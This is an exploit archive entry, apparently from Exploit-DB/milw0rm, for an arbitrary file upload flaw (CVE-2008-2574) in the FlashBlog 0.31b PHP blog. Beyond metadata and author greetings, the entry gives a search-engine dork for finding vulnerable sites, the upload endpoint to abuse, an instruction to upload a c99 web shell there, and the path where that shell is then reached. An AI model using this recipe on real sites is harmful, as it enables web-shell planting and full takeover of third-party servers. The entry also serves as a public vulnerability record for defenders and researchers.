[] NeoSense

FlashBlog 0.31b - Arbitrary File Upload

Author: ilker Kandemir
type: webapps
platform: php
port: 
date_added: 2008-06-02 
date_updated:  
verified: 1 
codes: OSVDB-46314;CVE-2008-2574 
tags: 
aliases:  
screenshot_url:  
application_url: 

FlashBlog beta0.31 Remote File Upload Vulnerability

# Author : ilker kandemir a.k.a MEFISTO

# Dork : inurl:flashblog.html  or  inurl:/flashblog/

# Website : www.dumenci.net, www.coderx.org

http://[site.com]/admin/Editor/imgupload.php ==>>> upload your c99 shell

http://[site.com]/tus_imagenes/c99.php ==>>> your address

Tnx: Dumenci, Damar, Cr@zy_king, Str0ke and all my friendz

# milw0rm.com [2008-06-03]